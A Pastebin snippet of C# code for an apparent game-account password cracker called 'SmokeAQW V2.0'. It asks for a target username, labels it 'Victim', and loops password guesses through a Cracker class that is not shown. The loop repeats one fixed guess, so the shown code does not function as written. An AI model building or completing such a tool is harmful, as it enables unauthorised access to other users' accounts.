Advertisement
Guest User

Untitled

a guest
Jun 4th, 2017
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 0.87 KB | None | 0 0
  1. static void Main(string[] args)
  2.         {
  3.             String SAQW_Title = "SmokeAQW V2.0";
  4.             String SAQW_Version = "2.0";
  5.             String Cusername = null;
  6.  
  7.             Console.Title = SAQW_Title.ToString();
  8.  
  9.             Console.WriteLine("Welcome to SmokeAQW V{0}", SAQW_Version);
  10.             Console.WriteLine("Please enter a Username to crack:");
  11.             Cusername = Console.ReadLine();
  12.             Console.WriteLine("Victim: {0}", Cusername);
  13.  
  14.             Cracker CrackerObject = new Cracker(Cusername);
  15.  
  16.             CrackerObject.Password = "xbox123";
  17.             while (CrackerObject.Run())
  18.             {
  19.                 Console.WriteLine("Current Try: {0}",CrackerObject.PasswordCount);
  20.                 CrackerObject.Password = "Xbox360";
  21.             }
  22.             Console.WriteLine(String.Format("Cracked: {0}", CrackerObject.Password));
  23.         }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement